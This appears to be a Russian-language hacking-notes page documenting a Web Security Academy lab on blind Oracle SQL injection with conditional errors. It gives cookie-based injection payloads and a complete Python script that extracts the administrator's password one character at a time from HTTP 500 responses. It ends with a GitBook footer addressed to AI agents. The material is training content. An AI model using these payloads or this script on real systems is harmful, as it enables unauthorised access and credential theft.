> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/web/sql-injection/blind-sql-injection-with-conditional-errors.md).

# Слепая SQL-инъекция с условными ошибками

### Слепая SQL-инъекция с условными ошибками

**Предпосылки:** значение `TrackingId` cookie внедряется в SQL-запрос. Приложение не возвращает результат напрямую, но вызывает \*\*ошибку HTTP 500\*\*, когда SQL-выражение приводит к исключению (здесь `TO_CHAR(1/0)` в Oracle). Мы используем эту строку: если условие истинно → ошибка 500, иначе ответ 200. База содержит `users(username, password)` таблицу. Цель: извлечь пароль из `administrator` и подключиться.

#### Техника-принцип (быстро)

* Cookie содержит выражение, которое вызывает ошибку, если условие истинно, напр.: (Oracle):

{% code overflow="wrap" %}

```sql
' || (SELECT CASE WHEN <condition> THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator') || '
```

{% endcode %}

* Если `<condition>` истинно → запрос вызывает деление на ноль → приложение возвращает `500` → бит = 1. Иначе `200` → бит = 0.
* Используйте `SUBSTR`/`LENGTH` для извлечения по одному символу.

#### Примеры полезных нагрузок (Oracle)

* Проверить существование пользователя:

  ```sql
  ' || (SELECT CASE WHEN (SELECT 'a' FROM users WHERE username='administrator') = 'a' THEN TO_CHAR(1/0) ELSE '' END FROM dual) || '
  ```
* Проверка длины = 20:

  ```sql
  ' || (SELECT CASE WHEN (SELECT LENGTH(password) FROM users WHERE username='administrator') = 20 THEN TO_CHAR(1/0) ELSE '' END FROM dual) || '
  ```
* Проверить символ в позиции i:

  ```sql
  ' || (SELECT CASE WHEN (SELECT SUBSTR(password, i, 1) FROM users WHERE username='administrator') = 'X' THEN TO_CHAR(1/0) ELSE '' END FROM dual) || '
  ```

(`FROM dual` / структуру можно адаптировать в соответствии с запросом, внедрённым в приложение.)

### Автоматизированный скрипт

```python
#!/usr/bin/env python3

import requests
import signal
import sys
import time
from string import ascii_letters, digits

# Обработка Ctrl+C без мусора
def def_handler(sig, frame):
    print("/nПрервано. Выход./n")
    sys.exit(1)
signal.signal(signal.SIGINT, def_handler)

# --- Конфигурация ---
MAIN_URL = "https://0a8a00f80354f1b1803108ce00e700b6.web-security-academy.net/"
TRACKING_BASE = "HNDtc0c9ybTvqk9m"   # легитимная часть TrackingId
SESSION_VALUE = "ZXuQT8xMsrBLG8KFDqvrccJDGFe8Z6Ra"
TIMEOUT = 6
SLEEP_BETWEEN = 0.15
MAX_PW_LEN = 50           # максимальная длина для проверки
ALPHABET = ascii_letters + digits + "!@#$%_-{}[]()"  # измените, если знаете алфавит

HEADERS = {"User-Agent": "Mozilla/5.0"}

# --- Вспомогательные функции ---
def send_payload(payload):
    cookies = {"TrackingId": payload, "Session": SESSION_VALUE}
    try:
        r = requests.get(MAIN_URL, cookies=cookies, headers=HEADERS,
                         timeout=TIMEOUT, allow_redirects=False, verify=True)
        return r.status_code
    except requests.exceptions.RequestException as e:
        print(f"[!] запрос не удался: {e}")
        return None

def make_error_payload(condition_sql):
    """
    Создаёт полный TrackingId для Oracle:
    например: TRACKING_BASE' || (SELECT CASE WHEN <cond> THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator') || '
    """
    # Оборачиваем условие в подзапрос, который возвращает одну строку для admin.
    payload = (f"{TRACKING_BASE}'|| (SELECT CASE WHEN ({condition_sql}) "
               f"THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator') ||'")
    return payload

# --- Шаг 1: определение длины пароля (необязательно, но полезно) ---
def detect_length(max_len=MAX_PW_LEN):
    print("[*] Определяю длину пароля...")
    for n in range(1, max_len + 1):
        cond = f"(SELECT LENGTH(password) FROM users WHERE username='administrator') = {n}"
        payload = make_error_payload(cond)
        code = send_payload(payload)
        if code == 500:
            print(f"[+] Обнаружена длина: {n}")
            return n
        time.sleep(SLEEP_BETWEEN)
    print("[!] Длина не обнаружена <= max_len; попробуйте увеличить max_len")
    return None

# --- Шаг 2: извлечение символ за символом ---
def extract_password(length=None):
    if length is None:
        length = detect_length()
        if length is None:
            # запасной вариант: пробовать позиции, пока не произойдёт сбой
            length = MAX_PW_LEN

    password = ""
    print(f"[*] Извлечение (предполагаемая длина = {length})")
    for pos in range(1, length + 1):
        found = False
        for ch in ALPHABET:
            # SUBSTR(password, pos, 1) = 'ch'
            cond = f"(SELECT SUBSTR(password, {pos}, 1) FROM users WHERE username='administrator') = '{ch}'"
            payload = make_error_payload(cond)
            code = send_payload(payload)
            if code == 500:
                password += ch
                print(f"[+] pos={pos} -> '{ch}' (пароль на данный момент: {password})")
                found = True
                time.sleep(SLEEP_BETWEEN)
                break
            # короткая пауза между попытками
            time.sleep(0.01)
        if not found:
            print(f"[-] Символ в позиции {pos} не найден -> вероятный конец. Пароль: {password}")
            break
    return password

if __name__ == "__main__":
    # определить длину, затем извлечь
    detected_len = detect_length(max_len=30)   # подстройте max_len в зависимости от окружения
    recovered = extract_password(length=detected_len)
    print(f"/n[=] Восстановленный пароль (частично/оценочно): {recovered}/n")
```

<figure><img src="/files/10f5de58bd0b709ee5819031151510456d0b8f5e" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/web/sql-injection/blind-sql-injection-with-conditional-errors.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
